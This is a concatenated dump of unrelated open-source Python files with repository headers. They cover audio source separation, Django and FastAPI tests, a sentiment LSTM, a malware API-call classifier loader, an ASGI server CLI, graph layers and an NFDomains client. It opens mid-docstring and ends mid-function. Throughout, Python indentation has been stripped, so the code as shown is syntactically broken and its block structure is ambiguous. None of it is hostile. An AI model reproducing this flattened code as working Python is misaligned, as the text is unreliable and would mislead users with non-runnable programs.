wmat (np.matrix): a 2D Numpy matrix containing the frequencies of analysis of the Fourier transform
"""
# Compute the stft of the two channel mixtures
self.audio_signal.stft_params = self.stft_params
self.audio_signal.stft()
stft_ch0 = self.audio_signal.get_stft_channel(0)
stft_ch1 = self.audio_signal.get_stft_channel(1)
# Compute the freq. matrix for later use in phase calculations
n_time_bins = len(self.audio_signal.time_bins_vector)
wmat = np.array(np.tile(np.mat(
self.audio_signal.freq_vector).T, (1, n_time_bins))) * (
2 * np.pi / sample_rate)
wmat += constants.EPSILON
return stft_ch0, stft_ch1, wmat
@staticmethod
def _compute_atn_delay(stft_ch0, stft_ch1, frequency_matrix):
# Calculate the symmetric attenuation (alpha) and delay (delta) for each
# time-freq. point
inter_channel_ratio = (stft_ch1 + constants.EPSILON) / (stft_ch0 + constants.EPSILON)
attenuation = np.abs(inter_channel_ratio) # relative attenuation between the two channels
symmetric_attenuation = attenuation - 1 / attenuation # symmetric attenuation
relative_delay = -np.imag(np.log(inter_channel_ratio)) / (2 * np.pi * frequency_matrix) # relative delay
return symmetric_attenuation, relative_delay
def _make_histogram(self):
"""Receives the stft of the two channel mixtures and the frequency matrix to a create
a smooth and normalized histogram.
Parameters:
stft_ch0 (complex np.array): a 2D Numpy matrix containing the stft of channel 0
stft_ch1 (complex np.array): a 2D Numpy matrix containing the stft of channel 1
symmetric_atn (np.array): the symmetric attenuation between two channels
delay (np.array): the time delay between 2 channels
wmat(np.array): a 2D Numpy matrix containing the frequency matrix of the signal
Returns:
histogram (np.array): a smooth and normalized histogram
atn_bins (np.array): The range of attenuation values distributed into bins
delay_bins (np.array): The range of delay values distributed into bins
"""
# calculate the weighted histogram
time_frequency_weights = (np.abs(self.stft_ch0) * np.abs(self.stft_ch1)) ** self.p * \
(np.abs(self.frequency_matrix)) ** self.q
# only consider time-freq. points yielding estimates in bounds
attenuation_premask = np.logical_and(self.attenuation_min < self.symmetric_atn,
self.symmetric_atn < self.attenuation_max)
delay_premask = np.logical_and(self.delay_min < self.delay, self.delay < self.delay_max)
attenuation_delay_premask = np.logical_and(attenuation_premask, delay_premask)
nonzero_premask = np.nonzero(attenuation_delay_premask)
symmetric_attenuation_vector = self.symmetric_atn[nonzero_premask]
delay_vector = self.delay[nonzero_premask]
time_frequency_weights_vector = time_frequency_weights[nonzero_premask]
bins_array = np.array([self.num_attenuation_bins, self.num_delay_bins])
range_array = np.array([[self.attenuation_min, self.attenuation_max], [self.delay_min, self.delay_max]])
# compute the histogram
histogram, atn_bins, delay_bins = np.histogram2d(symmetric_attenuation_vector, delay_vector,
bins=bins_array, range=range_array,
weights=time_frequency_weights_vector)
# Save non-normalized as an option for plotting later
self.attenuation_delay_histogram = histogram
# Scale histogram from 0 to 1
histogram /= histogram.max()
# smooth the normalized histogram - local average 3-by-3 neighboring bins
histogram = self._smooth_matrix(histogram, np.array([3]))
return histogram, atn_bins, delay_bins
def _convert_peaks(self, peak_indices):
"""Receives the attenuation and delay bins and computes the delay/attenuation
peaks based on the peak finder indices.
Returns:
delay_peak(np.array): The delay peaks determined from the histogram
atn_delay_est (np.array): The estimated symmetric attenuation and delay values
atn_peak (np.array): Attenuation converted from symmetric attenuation
"""
atn_indices = [x[0] for x in peak_indices]
delay_indices = [x[1] for x in peak_indices]
symmetric_atn_peak = self.attenuation_bins[atn_indices]
delay_peak = self.delay_bins[delay_indices]
atn_delay_est = np.column_stack((symmetric_atn_peak, delay_peak))
# convert symmetric_atn to atn_peak using formula from Rickard
atn_peak = (symmetric_atn_peak + np.sqrt(symmetric_atn_peak ** 2 + 4)) / 2
return delay_peak, atn_delay_est, atn_peak
def _compute_masks(self):
"""Receives the attenuation and delay peaks and computes a mask to be applied to the signal for source
separation.
"""
# compute masks for separation
best_so_far = np.inf * np.ones_like(self.stft_ch0, dtype=float)
for i in range(0, self.num_sources):
mask_array = np.zeros_like(self.stft_ch0, dtype=bool)
phase = np.exp(-1j * self.frequency_matrix * self.delay_peak[i])
score = np.abs(self.atn_peak[i] * phase * self.stft_ch0 - self.stft_ch1) ** 2 / (1 + self.atn_peak[i] ** 2)
mask = (score < best_so_far)
mask_array[mask] = True
background_mask = self.mask_type(np.array(mask_array))
self.result_masks.append(background_mask)
self.result_masks[0].mask = np.logical_xor(self.result_masks[i].mask, self.result_masks[0].mask)
best_so_far[mask] = score[mask]
# Compute first mask based on what the other masks left remaining
self.result_masks[0].mask = np.logical_not(self.result_masks[0].mask)
return self.result_masks
@staticmethod
def _smooth_matrix(matrix, kernel):
"""Performs two-dimensional convolution in order to smooth the values of matrix elements.
(similar to low-pass filtering)
Parameters:
matrix (np.array): a 2D Numpy matrix to be smoothed
kernel (np.array): a 2D Numpy matrix containing kernel values
Note:
if Kernel is of size 1 by 1 (scalar), a Kernel by Kernel matrix of 1/Kernel**2 will be used as the matrix
averaging kernel
Output:
smoothed_matrix (np.array): a 2D Numpy matrix containing a smoothed version of Mat (same size as Mat)
"""
# check the dimensions of the Kernel matrix and set the values of the averaging
# matrix, kernel_matrix
kernel_matrix = np.ones((kernel[0], kernel[0])) / kernel[0] ** 2
krow, kcol = np.shape(kernel_matrix)
# adjust the matrix dimension for convolution
copy_row = int(np.floor(krow / 2)) # number of rows to copy on top and bottom
copy_col = int(np.floor(kcol / 2)) # number of columns to copy on either side
# TODO: This is very ugly. Make this readable.
# form the augmented matrix (rows and columns added to top, bottom, and sides)
matrix = np.mat(matrix) # make sure Mat is a Numpy matrix
augmented_matrix = np.vstack(
[
np.hstack(
[matrix[0, 0] * np.ones((copy_row, copy_col)),
np.ones((copy_row, 1)) * matrix[0, :],
matrix[0, -1] * np.ones((copy_row, copy_col))
]),
np.hstack(
[matrix[:, 0] * np.ones((1, copy_col)),
matrix,
matrix[:, -1] * np.ones((1, copy_col))]),
np.hstack(
[matrix[-1, 1] * np.ones((copy_row, copy_col)),
np.ones((copy_row, 1)) * matrix[-1, :],
matrix[-1, -1] * np.ones((copy_row, copy_col))
]
)
]
)
# perform two-dimensional convolution between the input matrix and the kernel
smooted_matrix = signal.convolve2d(augmented_matrix, kernel_matrix[::-1, ::-1], mode='valid')
return smooted_matrix
|
scale/storage/test/test_delete_files_job.py | kaydoh/scale | 121 | 47190 | from __future__ import unicode_literals
import os
import django
from django.test import TestCase
from mock import call, patch
from storage.brokers.host_broker import HostBroker
from storage.delete_files_job import delete_files
from storage.test import utils as storage_test_utils
class TestDeleteFiles(TestCase):
def setUp(self):
django.setup()
self.broker = HostBroker()
self.broker.load_configuration({'type': HostBroker().broker_type, 'host_path': '/host/path'})
@patch('storage.brokers.host_broker.os.path.exists')
@patch('storage.brokers.host_broker.os.remove')
def test_delete_file(self, mock_remove, mock_exists):
"""Tests removing a file"""
def new_exists(path):
return True
mock_exists.side_effect = new_exists
volume_path = os.path.join('the', 'volume', 'path')
file_path_1 = os.path.join('my_dir', 'my_file.txt')
file_path_2 = os.path.join('my_dir', 'my_file.json')
full_path_file_1 = os.path.join(volume_path, file_path_1)
full_path_file_2 = os.path.join(volume_path, file_path_2)
file_1 = storage_test_utils.create_file(file_path=file_path_1)
file_2 = storage_test_utils.create_file(file_path=file_path_2)
# Call function
test_1 = delete_files([file_1], volume_path, self.broker)
self.assertEqual(test_1, None)
test_2 = delete_files([file_2], volume_path, self.broker)
self.assertEqual(test_2, None)
# Check results
two_calls = [call(full_path_file_1), call(full_path_file_2)]
mock_remove.assert_has_calls(two_calls)
|
junior_class/chapter-6-sentiment_classification/code/model/sentiment_classifier.py | wwhio/awesome-DeepLearning | 1,150 | 47210 | # copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn.functional as F
from paddle.nn import LSTM, Embedding, Dropout, Linear
import numpy as np
class SentimentClassifier(paddle.nn.Layer):
def __init__(self, hidden_size, vocab_size, class_num=2, num_steps=128, num_layers=1, init_scale=0.1, dropout=None):
# 参数含义如下:
# 1.hidden_size,表示embedding-size,hidden和cell向量的维度
# 2.vocab_size,模型可以考虑的词表大小
# 3.class_num,情感类型个数,可以是2分类,也可以是多分类
# 4.num_steps,表示这个情感分析模型最大可以考虑的句子长度
# 5.num_layers,表示网络的层数
# 6.init_scale,表示网络内部的参数的初始化范围
# 长短时记忆网络内部用了很多Tanh,Sigmoid等激活函数,这些函数对数值精度非常敏感,
# 因此我们一般只使用比较小的初始化范围,以保证效果
super(SentimentClassifier, self).__init__()
self.hidden_size = hidden_size
self.vocab_size = vocab_size
self.class_num = class_num
self.init_scale = init_scale
self.num_layers = num_layers
self.num_steps = num_steps
self.dropout = dropout
# 声明一个LSTM模型,用来把每个句子抽象成向量
self.simple_lstm_rnn = LSTM(input_size=hidden_size, hidden_size=hidden_size, num_layers=num_layers)
# 声明一个embedding层,用来把句子中的每个词转换为向量
self.embedding = Embedding(num_embeddings=vocab_size, embedding_dim=hidden_size, sparse=False,
weight_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Uniform(low=-init_scale, high=init_scale)))
# 在得到一个句子的向量表示后,需要根据这个向量表示对这个句子进行分类
# 一般来说,可以把这个句子的向量表示乘以一个大小为[self.hidden_size, self.class_num]的W参数,
# 并加上一个大小为[self.class_num]的b参数,从而达到把句子向量映射到分类结果的目的
# 我们需要声明最终在使用句子向量映射到具体情感类别过程中所需要使用的参数
# 这个参数的大小一般是[self.hidden_size, self.class_num]
self.cls_fc = Linear(in_features=self.hidden_size, out_features=self.class_num,
weight_attr=None, bias_attr=None)
self.dropout_layer = Dropout(p=self.dropout, mode='upscale_in_train')
def forward(self, input, label):
batch_size = len(input)
# 首先我们需要定义LSTM的初始hidden和cell,这里我们使用0来初始化这个序列的记忆
init_hidden_data = np.zeros(
(self.num_layers, batch_size, self.hidden_size), dtype='float32')
init_cell_data = np.zeros(
(self.num_layers, batch_size, self.hidden_size), dtype='float32')
# 将这些初始记忆转换为飞桨可计算的向量
# 设置stop_gradient=True,避免这些向量被更新,从而影响训练效果
init_hidden = paddle.to_tensor(init_hidden_data)
init_hidden.stop_gradient = True
init_cell = paddle.to_tensor(init_cell_data)
init_cell.stop_gradient = True
init_h = paddle.reshape(
init_hidden, shape=[self.num_layers, -1, self.hidden_size])
init_c = paddle.reshape(
init_cell, shape=[self.num_layers, -1, self.hidden_size])
# 将输入的句子的mini-batch转换为词向量表示
x_emb = self.embedding(input)
x_emb = paddle.reshape(
x_emb, shape=[-1, self.num_steps, self.hidden_size])
if self.dropout is not None and self.dropout > 0.0:
x_emb = self.dropout_layer(x_emb)
# 使用LSTM网络,把每个句子转换为向量表示
rnn_out, (last_hidden, last_cell) = self.simple_lstm_rnn(x_emb, (init_h, init_c))
last_hidden = paddle.reshape(
last_hidden[-1], shape=[-1, self.hidden_size])
# 将每个句子的向量表示映射到具体的情感类别上
projection = self.cls_fc(last_hidden)
pred = F.softmax(projection, axis=-1)
# 根据给定的标签信息,计算整个网络的损失函数,这里我们可以直接使用分类任务中常使用的交叉熵来训练网络
loss = F.softmax_with_cross_entropy(
logits=projection, label=label, soft_label=False)
loss = paddle.mean(loss)
# 最终返回预测结果pred,和网络的loss
return pred, loss
|
tests/test_openapi_scheme.py | montaro/fastapi-azure-auth | 137 | 47211 | import pytest
from demo_project.main import app
from fastapi.testclient import TestClient
openapi_schema = {
'openapi': '3.0.2',
'info': {
'title': 'My Project',
'description': '## Welcome to my API! \n This is my description, written in `markdown`',
'version': '1.0.0',
},
'paths': {
'/api/v1/hello': {
'get': {
'tags': ['hello'],
'summary': 'Say hello',
'description': 'Wonder who we say hello to?',
'operationId': 'helloWorld',
'responses': {
'200': {
'description': 'Successful Response',
'content': {
'application/json': {'schema': {'$ref': '#/components/schemas/HelloWorldResponse'}}
},
}
},
'security': [{'Azure AD - PKCE, Single-tenant': []}],
}
},
'/api/v1/hello-multi-auth': {
'get': {
'tags': ['hello'],
'summary': 'Say hello with an API key',
'description': 'Wonder how this auth is done?',
'operationId': 'helloWorldApiKey',
'responses': {
'200': {
'description': 'Successful Response',
'content': {'application/json': {'schema': {'$ref': '#/components/schemas/TokenType'}}},
}
},
'security': [{'Azure AD - PKCE, Multi-tenant': []}, {'APIKeyHeader': []}],
}
},
},
'components': {
'schemas': {
'HelloWorldResponse': {
'title': 'HelloWorldResponse',
'required': ['hello', 'user'],
'type': 'object',
'properties': {
'hello': {'title': 'Hello', 'type': 'string', 'description': 'What we\'re saying hello to'},
'user': {
'title': 'User',
'allOf': [{'$ref': '#/components/schemas/User'}],
'description': 'The user object',
},
},
},
'TokenType': {
'title': 'TokenType',
'required': ['api_key', 'azure_auth'],
'type': 'object',
'properties': {
'api_key': {'title': 'Api Key', 'type': 'boolean', 'description': 'API key was used'},
'azure_auth': {'title': 'Azure Auth', 'type': 'boolean', 'description': 'Azure auth was used'},
},
},
'User': {
'title': 'User',
'required': ['aud', 'tid', 'claims', 'access_token'],
'type': 'object',
'properties': {
'aud': {'title': 'Aud', 'type': 'string', 'description': 'Audience'},
'tid': {'title': 'Tid', 'type': 'string', 'description': 'Tenant ID'},
'roles': {
'title': 'Roles',
'type': 'array',
'items': {'type': 'string'},
'description': 'Roles (Groups) the user has for this app',
'default': [],
},
'claims': {'title': 'Claims', 'type': 'object', 'description': 'The entire decoded token'},
'scp': {'title': 'Scp', 'type': 'string', 'description': 'Scope'},
'name': {'title': 'Name', 'type': 'string', 'description': 'Name'},
'access_token': {
'title': 'Access Token',
'type': 'string',
'description': 'The access_token. Can be used for fetching the Graph API',
},
},
},
},
'securitySchemes': {
'Azure AD - PKCE, Single-tenant': {
'type': 'oauth2',
'description': '`Leave client_secret blank`',
'flows': {
'authorizationCode': {
'scopes': {
'api://oauth299-9999-9999-abcd-efghijkl1234567890/user_impersonation': '**No client secret needed, leave blank**'
},
'authorizationUrl': 'https://login.microsoftonline.com/intility_tenant_id/oauth2/v2.0/authorize',
'tokenUrl': 'https://login.microsoftonline.com/intility_tenant_id/oauth2/v2.0/token',
}
},
},
'Azure AD - PKCE, Multi-tenant': {
'description': '`Leave ' 'client_secret ' 'blank`',
'flows': {
'authorizationCode': {
'authorizationUrl': 'https://login.microsoftonline.com/common/oauth2/v2.0/authorize',
'scopes': {
'api://oauth299-9999-9999-abcd-efghijkl1234567890/user_impersonation': 'User '
'impersonation'
},
'tokenUrl': 'https://login.microsoftonline.com/common/oauth2/v2.0/token',
}
},
'type': 'oauth2',
},
'APIKeyHeader': {'type': 'apiKey', 'in': 'header', 'name': 'TEST-API-KEY'},
},
},
}
@pytest.fixture
def test_client():
"""
Test client that does not run startup event.
All these tests fails before we get to loading the OpenID Connect configuration.
"""
yield TestClient(app=app)
def test_openapi_schema(test_client):
response = test_client.get('api/v1/openapi.json')
assert response.status_code == 200, response.text
assert response.json() == openapi_schema
def test_no_token(test_client):
response = test_client.get('/api/v1/hello')
assert response.status_code == 401, response.text
assert response.json() == {'detail': 'Not authenticated'}
def test_incorrect_token(test_client):
response = test_client.get('/api/v1/hello', headers={'Authorization': 'Non-existent testtoken'})
assert response.status_code == 401, response.text
assert response.json() == {'detail': 'Not authenticated'}
def test_token(test_client):
response = test_client.get('/api/v1/hello', headers={'Authorization': 'Bearer '})
assert response.status_code == 401, response.text
assert response.json() == {'detail': 'Invalid token format'}
|
tests/test_load_docker_api.py | ReconPangolin/tern | 361 | 47218 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2020 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause
import unittest
from tern.load import docker_api
from tern.utils import rootfs
from test_fixtures import create_working_dir
from test_fixtures import remove_working_dir
class TestLoadDockerAPI(unittest.TestCase):
"""This test case requires a temporary folder to be set up and the Docker
daemon to be up and running properly"""
def setUp(self):
self.client = docker_api.check_docker_setup()
create_working_dir()
rootfs.set_working_dir()
def tearDown(self):
# should not do anything if the client is already closed
docker_api.close_client(self.client)
# clean up working directory
remove_working_dir()
def testBuildAndRemoveImage(self):
# working dockerfile
dockerfile_path = 'tests/dockerfiles/debian_buster_apt'
image_obj = docker_api.build_image(dockerfile_path, self.client)
self.assertTrue(image_obj)
# successful remove
self.assertTrue(docker_api.remove_image(image_obj, self.client))
# remove an image that is not there
self.assertFalse(docker_api.remove_image(image_obj, self.client))
# no dockerfile
image_obj = docker_api.build_image(
'dockerfiles/not_there', self.client)
self.assertFalse(image_obj)
# failed build
image_obj = docker_api.build_image(
'tests/dockerfiles/fail_build', self.client)
self.assertFalse(image_obj)
def testExtractImage(self):
# successful save
dockerfile_path = 'tests/dockerfiles/debian_buster_apt'
image_obj = docker_api.build_image(dockerfile_path, self.client)
self.assertTrue(docker_api.extract_image(image_obj))
docker_api.remove_image(image_obj, self.client)
if __name__ == '__main__':
unittest.main()
|
tests/update_golds.py | leonardt/magma | 167 | 47219 | """
Expected to be run from repo root
"""
import shutil
import os
def copy_golds(dir_path):
for f in os.listdir(os.path.join(dir_path, "gold")):
try:
shutil.copy(
os.path.join(dir_path, "build", f),
os.path.join(dir_path, "gold", f)
)
except FileNotFoundError as e:
# corresponding build has different name or extra file
pass
copy_golds("tests")
for name in os.listdir("tests"):
if not os.path.isdir(os.path.join("tests", name)):
continue
if "gold" in os.listdir(os.path.join("tests", name)):
copy_golds(os.path.join("tests", name))
|
src/multiclass/LSTMMultiClass.py | ocatak/malware_api_class | 172 | 47226 | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""
import pandas as pd
from keras import preprocessing
import os
import datetime
from multiclass.AnalizeRunner import AnalizeRunner
##################################################
prefix = "dataset"
data_path = "C:\\Users\\afy\\PycharmProjects\\AnalizeProject\\deep-learning\Data\\result\\2018-09-19 23_05_12.089157\\filtered\\"
model_path = "C:\\Users\\afy\\PycharmProjects\\AnalizeProject\\multiclass\\result\\"
main_folder_name = model_path + str(datetime.datetime.now()).replace(":", "_") + "\\"
runner = AnalizeRunner()
def read_type_data():
df = pd.read_csv(data_path + prefix + "_types.zip", delimiter=' ', header=None, compression="zip")
df[0] = df[0].astype('category')
cat = df[0].cat
df[0] = df[0].cat.codes
y = df[0].values
return y
def read_call_data():
df = pd.read_csv(data_path + prefix + "_calls.zip", delimiter=' ', header=None, compression="zip")
D = df.values
ds_tmp = D[:, 0].tolist()
ds = []
for v in ds_tmp:
ds.append(v.split(','))
X = preprocessing.sequence.pad_sequences(ds, maxlen=342)
print(X.shape)
return X
os.makedirs(main_folder_name)
print("-------------------basliyor------------")
X = read_call_data()
y = read_type_data()
runner.startAnalize(X, y, main_folder_name) |
indexpy/cli.py | abersheeran/index.py | 242 | 47232 | from __future__ import annotations
import os
import signal
import subprocess
import sys
import time
from multiprocessing import cpu_count
from typing import List, Union
import click
from .__version__ import __version__
from .routing.commands import display_urls
from .utils import F, import_from_string, import_module
def execute(command: Union[List[str], str]) -> int:
if isinstance(command, str):
command = command.split(" ")
click.echo("Execute command: ", nl=False)
click.secho(" ".join(command), fg="green")
process = subprocess.Popen(command, shell=False)
def sigint_handler(signo, frame):
process.terminate()
process.wait()
signal.signal(signal.SIGTERM, sigint_handler)
while process.poll() is None:
time.sleep(1)
return process.returncode
@click.group(help=f"Index.py {__version__}")
def index_cli():
pass
try:
import hypercorn
except ImportError:
pass
else:
@click.command(help="use hypercorn to run Index.py application")
@click.option(
"--bind",
default="127.0.0.1:4190",
show_default=True,
help="A string of the form: HOST:PORT, unix:PATH, fd://FD.",
)
@click.option(
"--log-level",
type=click.Choice(["critical", "error", "warning", "info", "debug"]),
default="info",
show_default=True,
)
@click.option(
"--worker-class",
"-k",
default="asyncio",
type=click.Choice(["asyncio", "uvloop", "trio"]),
show_choices=True,
show_default=True,
)
@click.option(
"--configuration",
"-c",
type=click.Path(exists=True, file_okay=True, dir_okay=False, readable=True),
)
@click.argument("application")
def hypercorn_cli(
worker_class: str,
configuration: str,
application: str,
bind: str,
log_level: str,
):
sys.path.insert(0, os.getcwd())
asgi_app = import_from_string(application)
config = hypercorn.Config()
if configuration is not None:
if configuration.endswith(".py"):
config.from_pyfile(configuration)
elif configuration.endswith(".toml"):
config.from_toml(configuration)
else:
click.secho(
"Please use configuration file path endswith `.py` or `.toml`.",
fg="red",
)
raise SystemExit(1)
config.bind = [bind]
config.loglevel = log_level.upper()
config.worker_class = worker_class
create_signal_handle = lambda shutdown_event: lambda sig, frame: (
setattr(asgi_app, "should_exit", True), # type: ignore
shutdown_event.set(),
)
if worker_class == "uvloop":
import uvloop
uvloop.install()
if worker_class in ("asyncio", "uvloop"):
import asyncio
from hypercorn.asyncio import serve
loop = asyncio.get_event_loop()
shutdown_event = asyncio.Event(loop=loop)
for sig in {signal.SIGINT, signal.SIGTERM}:
signal.signal(sig, create_signal_handle(shutdown_event))
loop.run_until_complete(
serve(asgi_app, config, shutdown_trigger=shutdown_event.wait) # type: ignore
)
else:
import trio
from hypercorn.trio import serve # type: ignore
shutdown_event = trio.Event()
for sig in {signal.SIGINT, signal.SIGTERM}:
signal.signal(sig, create_signal_handle(shutdown_event))
trio.run(serve(asgi_app, config, shutdown_trigger=shutdown_event.wait)) # type: ignore
index_cli.add_command(hypercorn_cli, name="hypercorn")
try:
import uvicorn
except ImportError:
pass
else:
from .applications import Index
# See https://stackoverflow.com/questions/58133694/graceful-shutdown-of-uvicorn-starlette-app-with-websockets
origin_handle_exit = uvicorn.Server.handle_exit
def handle_exit(self: uvicorn.Server, sig, frame):
application = self.config.loaded_app
while not isinstance(application, Index):
application = application.app
application.should_exit = True
return origin_handle_exit(self, sig, frame)
uvicorn.Server.handle_exit = handle_exit
@click.command(help="use uvicorn to run Index.py application")
@click.option(
"--bind",
default="127.0.0.1:4190",
show_default=True,
help="A string of the form: HOST:PORT, unix:PATH, fd://FD.",
)
@click.option("--autoreload/--no-autoreload", default=True, show_default=True)
@click.option(
"--log-level",
type=click.Choice(["critical", "error", "warning", "info", "debug"]),
default="info",
show_default=True,
)
@click.argument("application")
def uvicorn_cli(application: str, bind: str, autoreload: bool, log_level: str):
sys.path.insert(0, os.getcwd())
if bind.startswith("unix:"):
bind_config = {"uds": bind[5:] | F(os.path.normpath) | F(os.path.abspath)}
if autoreload:
click.secho(
"Reload option doesnt work with unix sockets "
"in uvicorn: https://github.com/encode/uvicorn/issues/722",
fg="yellow",
)
elif bind.startswith("fd://"):
bind_config = {"fd": int(bind[5:])}
if autoreload:
click.secho(
"Reload option doesnt work with fd "
"in uvicorn: https://github.com/encode/uvicorn/issues/368",
fg="yellow",
)
else:
if ":" in bind:
host, port = bind.split(":")
bind_config = {"host": host, "port": int(port)}
else:
bind_config = {"host": bind, "port": 4190}
uvicorn.run(
application,
**bind_config,
log_level=log_level,
interface="asgi3",
lifespan="on",
reload=autoreload,
)
index_cli.add_command(uvicorn_cli, "uvicorn")
try:
import gunicorn
assert gunicorn.version_info > (20, 1)
del gunicorn
except ImportError:
pass
else:
MASTER_PID_FILE = ".gunicorn.pid"
def read_gunicorn_master_pid(pid_file: str = MASTER_PID_FILE) -> int:
try:
with open(os.path.join(os.getcwd(), pid_file), "r") as file:
return int(file.read())
except FileNotFoundError:
sys.exit(
(
f'File "{pid_file}" not found, '
+ "please make sure you have started gunicorn using the "
+ "`index-cli gunicorn start ...`."
)
)
@click.group(help="use gunicorn to run Index.py application")
def gunicorn_cli():
pass
@gunicorn_cli.command(help="Run gunicorn")
@click.option(
"--bind",
default="127.0.0.1:4190",
show_default=True,
help="A string of the form: HOST:PORT, unix:PATH, fd://FD.",
)
@click.option("--autoreload/--no-autoreload", default=False, show_default=True)
@click.option(
"--log-level",
type=click.Choice(["critical", "error", "warning", "info", "debug"]),
default="info",
show_default=True,
)
@click.option("--workers", "-w", default=cpu_count(), show_default=True)
@click.option(
"--worker-class",
"-k",
default="uvicorn.workers.UvicornWorker",
show_default=True,
)
@click.option("--daemon", "-d", default=False, is_flag=True, show_default=True)
@click.option(
"--configuration",
"-c",
type=click.Path(exists=True, file_okay=True, dir_okay=False, readable=True),
)
@click.argument("application")
def start(
workers: int,
worker_class: str,
daemon: bool,
configuration: str,
application: str,
bind: str,
autoreload: bool,
log_level: str,
):
command = (
f"{sys.executable} -m gunicorn -k {worker_class}"
+ f" --bind {bind}"
+ f" --chdir {os.getcwd()}"
+ f" --workers {workers}"
+ f" --pid {MASTER_PID_FILE}"
+ f" --log-level {log_level}"
)
args = command.split(" ")
if daemon:
args.extend("-D --log-file gunicorn.log".split(" "))
if autoreload:
args.append("--reload")
if configuration:
args.append("-c")
args.append(configuration.strip())
args.append(application)
execute(args)
# Gunicorn signal handler
# https://docs.gunicorn.org/en/stable/signals.html
@gunicorn_cli.command(help="Increment the number of processes by one")
def incr():
os.kill(read_gunicorn_master_pid(), signal.SIGTTIN)
@gunicorn_cli.command(help="Decrement the number of processes by one")
def decr():
os.kill(read_gunicorn_master_pid(), signal.SIGTTOU)
@gunicorn_cli.command(help="Stop gunicorn processes")
@click.option("--force", "-f", default=False, is_flag=True)
def stop(force):
os.kill(read_gunicorn_master_pid(), signal.SIGINT if force else signal.SIGTERM)
@gunicorn_cli.command(help="Reload configuration and recreate worker processes")
def reload():
os.kill(read_gunicorn_master_pid(), signal.SIGHUP)
@gunicorn_cli.command(help="Restart gunicorn master processes and worker processes")
@click.option("--force-stop", "-f", default=False, is_flag=True)
def restart(force_stop):
oldpid = read_gunicorn_master_pid()
os.kill(oldpid, signal.SIGUSR2)
# Waiting for starting new master process and worker processes
while not os.path.exists(os.path.join(os.getcwd(), MASTER_PID_FILE + ".2")):
time.sleep(0.5)
# Stop old master process and worker processes
os.kill(oldpid, signal.SIGINT if force_stop else signal.SIGTERM)
index_cli.add_command(gunicorn_cli, "gunicorn")
index_cli.add_command(display_urls, "display-urls")
import_module("commands")
|
unittest/scripts/auto/py_shell/scripts/util_help_norecord.py | mueller/mysql-shell | 119 | 47270 | #@ util help
util.help()
#@ util help, \? [USE:util help]
\? util
#@ util check_for_server_upgrade help
util.help('check_for_server_upgrade')
#@ util check_for_server_upgrade help, \? [USE:util check_for_server_upgrade help]
\? check_for_server_upgrade
# WL13807-TSFR_1_1
#@ util dump_instance help
util.help('dump_instance');
#@ util dump_instance help, \? [USE:util dump_instance help]
\? dump_instance
# WL13807-TSFR_2_1
#@ util dump_schemas help
util.help('dump_schemas');
#@ util dump_schemas help, \? [USE:util dump_schemas help]
\? dump_schemas
# WL13804-TSFR_6_1
#@ util dump_tables help
util.help('dump_tables');
#@ util dump_tables help, \? [USE:util dump_tables help]
\? dump_tables
# WL13804-TSFR_1_4
#@ util export_table help
util.help('export_table');
#@ util export_table help, \? [USE:util export_table help]
\? export_table
#@ util import_json help
util.help('import_json')
#@ util import_json help, \? [USE:util import_json help]
\? import_json
#@ util import_table help
util.help('import_table')
#@ util import_table help, \? [USE:util import_table help]
\? import_table
#@ util load_dump help
util.help('load_dump')
#@ util load_dump help, \? [USE:util load_dump help]
\? load_dump
|
cogdl/layers/gine_layer.py | li-ziang/cogdl | 1,072 | 47320 | import torch
import torch.nn.functional as F
from cogdl.utils import spmm
from . import BaseLayer
class GINELayer(BaseLayer):
r"""The modified GINConv operator from the `"Graph convolutions that can finally model local structure" paper
<https://arxiv.org/pdf/2011.15069.pdf>`__.
Parameters
----------
apply_func : callable layer function)
layer or function applied to update node feature
eps : float32, optional
Initial `\epsilon` value.
train_eps : bool, optional
If True, `\epsilon` will be a learnable parameter.
"""
def __init__(self, apply_func=None, eps=0, train_eps=True):
super(GINELayer, self).__init__()
if train_eps:
self.eps = torch.nn.Parameter(torch.FloatTensor([eps]))
else:
self.register_buffer("eps", torch.FloatTensor([eps]))
self.apply_func = apply_func
def forward(self, graph, x):
# m = self.message(x[graph.edge_index[0]], graph.edge_attr)
# out = self.aggregate(graph, m)
out = spmm(graph, x)
out += (1 + self.eps) * x
if self.apply_func is not None:
out = self.apply_func(out)
return out
def message(self, x, attr):
return F.relu(x + attr)
|
events/migrations/0010_auto_20180528_2033.py | Akash1S/meethub | 428 | 47332 | <reponame>Akash1S/meethub
# Generated by Django 2.0.4 on 2018-05-28 20:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('events', '0009_auto_20180428_0845'),
]
operations = [
migrations.RemoveField(
model_name='comment',
name='created_by',
),
migrations.RemoveField(
model_name='comment',
name='event',
),
migrations.DeleteModel(
name='Comment',
),
]
|
base/site-packages/mobileadmin/templatetags/mobile_admin_media.py | edisonlz/fastor | 285 | 47348 | <filename>base/site-packages/mobileadmin/templatetags/mobile_admin_media.py
from django.template import Library
register = Library()
def mobileadmin_media_prefix():
"""
Returns the string contained in the setting MOBILEADMIN_MEDIA_PREFIX.
"""
try:
from mobileadmin.conf import settings
except ImportError:
return ''
return settings.MEDIA_PREFIX
mobileadmin_media_prefix = register.simple_tag(mobileadmin_media_prefix)
|
src/algo/api_nfdomains.py | jumperavocado/staketaxcsv | 140 | 47358 | import logging
import requests
from settings_csv import ALGO_NFDOMAINS
# API documentation: https://editor.swagger.io/?url=https://api.testnet.nf.domains/info/openapi3.yaml
class NFDomainsAPI:
session = requests.Session()
def get_address(self, name):
endpoint = f"nfd/{name}"
params = {"view": "brief"}
data, status_code = self._query(ALGO_NFDOMAINS, endpoint, params)
if status_code == 200:
# https://docs.nf.domains/docs/faq#how-do-i-set-my-address-to-resolve-my-nfd
# If present, use the primary/deposit address, otherwise resolve to the owner address
if "caAlgo" in data:
return data["caAlgo"][0]
else:
return data["owner"]
else:
return None
def _query(self, base_url, endpoint, params=None):
